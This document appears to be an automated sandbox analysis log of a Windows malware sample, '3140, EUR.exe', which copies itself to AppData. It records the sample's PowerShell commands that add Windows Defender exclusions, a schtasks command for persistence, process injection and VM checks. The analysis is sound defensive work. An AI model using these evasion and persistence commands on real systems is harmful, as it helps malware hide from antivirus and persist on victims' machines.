Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597786 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597560 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597334 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597212 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597045 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596717 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596391 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596266 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595266 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595016 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594865 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594180 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594061 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593953 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593844 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593734 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593625 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593502 Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599560
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599432
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598387
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598266
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597594
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595294
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595058
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594062
Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 3140, EUR.exe, 00000008.00000002.4120490815.00000000013A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllubli
Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000D50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4120391587.0000000001496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29548 LdrInitializeThunk, 15_2_06F29548
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe" Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\3140, EUR.exe Memory written: C:\Users\user\Desktop\3140, EUR.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory written: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe" Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp" Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
